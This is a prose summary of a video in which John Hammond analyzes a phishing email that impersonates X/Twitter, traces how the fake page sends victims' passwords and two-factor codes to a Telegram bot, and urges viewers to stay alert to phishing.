John Hammond Analyzes Phishing Email Targeting Twitter Users
In this video, John Hammond conducts an in-depth analysis of a phishing email he received, claiming that the content of his Twitter or X page violates X community guidelines. The email, sent via an email relay provider, contains a "Review Details" button that is actually a trap to lure the user into clicking and falling for the phishing scam. Hammond begins by examining the URL hidden behind the "Review Details" button. Using command-line tools like curl, he discovers that the URL redirects to a fraudulent website. He then uses a web browser to directly access the site, revealing a page that mimics a content management interface, likely inspired by TweetDeck or similar tools. By exploring the page's source code, Hammond finds comments and JavaScript scripts that appear to be attempts to evade automated security mechanisms. He also identifies calls to a Telegram API, suggesting that the stolen information is sent to a Telegram bot. Using a tool called Mattcap, Hammond manages to infiltrate the Telegram bot and access the messages it has received, revealing sensitive information such as passwords, two-factor authentication codes, and IP addresses of the victims. Hammond also discovers that the phishing site uses a third-party API to retrieve information about Twitter users, including their profile photos and usernames. The site is designed to ask users to enter their passwords and then transmit this information to the Telegram bot. He notes that the site also includes features to bypass two-factor authentication by asking users to enter their verification codes. Using the information retrieved via Mattcap, Hammond attempts to contact the individuals behind the Telegram bot, but they seem to block his communication attempts. He also finds clues suggesting that the attackers might be based in Turkey, although he cannot confirm this with certainty. In conclusion, Hammond emphasizes the importance of vigilance against phishing attempts and demonstrates how cybersecurity tools can be used to analyze and counter these threats. He encourages viewers to stay informed and use robust security practices to protect their personal information.